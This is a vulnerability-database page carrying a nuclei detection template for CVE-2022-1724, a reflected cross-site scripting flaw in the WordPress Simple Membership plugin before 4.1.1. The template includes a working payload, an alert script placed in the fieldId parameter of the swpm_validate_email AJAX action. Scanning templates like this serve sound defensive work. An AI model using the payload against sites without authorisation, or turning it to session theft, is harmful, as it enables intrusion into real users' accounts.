Lucene search
K

WordPress Simple Membership <4.1.1 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

WordPress Simple Membership <4.1.1 - Cross-Site Scripting, reflected XSS vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1724
13 Jun 202213:15
attackerkb
CNNVD
WordPress plugin Simple Membership 跨站脚本漏洞
13 Jun 202200:00
cnnvd
CNVD
WordPress Simple Membership plugin跨站脚本漏洞
15 Jun 202200:00
cnvd
CVE
CVE-2022-1724
13 Jun 202212:42
cve
Cvelist
CVE-2022-1724 Simple Membership < 4.1.1 - Reflected Cross-Site Scripting
13 Jun 202212:42
cvelist
EUVD
EUVD-2022-25006
3 Oct 202520:07
euvd
NVD
CVE-2022-1724
13 Jun 202213:15
nvd
OSV
CVE-2022-1724
13 Jun 202213:15
osv
Patchstack
WordPress Simple Membership plugin <= 4.1.0 - Reflected Cross-Site Scripting (XSS) vulnerability
23 May 202200:00
patchstack
Prion
Cross site scripting
13 Jun 202213:15
prion
Rows per page
id: CVE-2022-1724

info:
  name: WordPress Simple Membership <4.1.1 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of WordPress Simple Membership plugin (4.1.1 or higher) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/96a0a667-9c4b-4ea6-b78a-0681e9a9bbae
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1724
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1724
    cwe-id: CWE-79
    epss-score: 0.01693
    epss-percentile: 0.74314
    cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: "simple-membership-plugin"
    product: "simple_membership"
    framework: wordpress
  tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Simple Membership'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"<script>alert(document.domain)</script>",'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402205994a447e6546cbb63e7c290f4355f44c16e5b6a633f55a703278fa69746572d02207a9ed764d7fb82dbdc5a8be34b4a88a3e5d15eb9523e24d2b6b6741e2e13bc85:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.01693
25